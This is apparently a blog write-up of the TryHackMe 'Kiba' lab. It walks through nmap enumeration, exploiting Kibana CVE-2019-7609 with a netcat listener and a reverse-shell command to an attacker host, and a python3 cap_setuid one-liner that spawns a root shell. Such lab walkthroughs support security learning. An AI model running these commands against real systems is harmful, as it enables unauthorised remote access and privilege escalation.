kiba-TryHackMe

Kiba-TryHackMe

This is a write-up for Kiba room from TryHackMe. This room can be found here:-

https://tryhackme.com/room/kiba

Room Description: Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.

#1 What is the vulnerability that is specific to programming languages with prototype-based inheritance?

Check out the following link which describes this issue in details and will also give the answer:

https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/#:~:text=Prototype%20pollution%20is%20a%20vulnerability,lacks%20practical%20examples%20of%20exploitation.

#2 What is the version of visualization dashboard installed in the server?

Lets first enumerate the box using NMAP to find out all the open ports with the command:

sudo nmap -sS -Pn -T4 -p- 10.10.125.142

nmap scan for ports

Lets find out what is running on these open ports using the command:

sudo nmap -O -A -Pn -T4 -p22,80,5044,5601 10.10.125.142

nmap scan for services

The most interesting thing that comes out of this NMAP scan is kibana running on port 5601 which is open source data visualization dashboard for Elasticsearch.

Open this in a browser and look around and we will get the version which we are looking for.

kibana webpage

#3 What is the CVE number for this vulnerability? This will be in the format: CVE-0000–0000

Now we have the application name Kibana and a version, if we search we will find the CVE. The details can also be found Answer #1

#4 Compromise the machine and locate user.txt

Lets exploit the CVE and gets reverse shell. I have used an already published exploit available here:-

https://github.com/LandGrey/CVE-2019-7609/

First open up a netcat listen from the attacking machine using:

nc -nlvp 9999

and run the exploit as

python CVE-2019-7609-kibana-rce.py -u http://10.10.41.246:5601 -host 10.10.10.10 -port 9999 --shell

kibana cve-2019–7609

We will get the reverse shell and the user flag:

user flag

#5 Capabilities is a concept that provides a security system that allows “divide” root privileges into different values

Nice to know and no answer needed.

#6 How would you recursively list all of these capabilities?

getcap -r /

#7 Escalate privileges and obtain root.txt

Use the above command to find capabilities which can be abused and we will find:

capabilities

python3 in /home/kiba/.hackmeplease directory have cap_setuid set which can be abused to get root privileges using:

/home/kiba/.hackmeplease/python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

and the root flag at /root/root.txt:

root flag

Submit the flag and get the points :) See you next time.

Originally published at https://basicpentesting.blogspot.com on August 29, 2020.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Write-up: CORS vulnerability with trusted null origin @ PortSwigger Academy

Previse-HTB-Writeup

Day 8: Insecure deserialization

Previse HacktheBox Walkthrough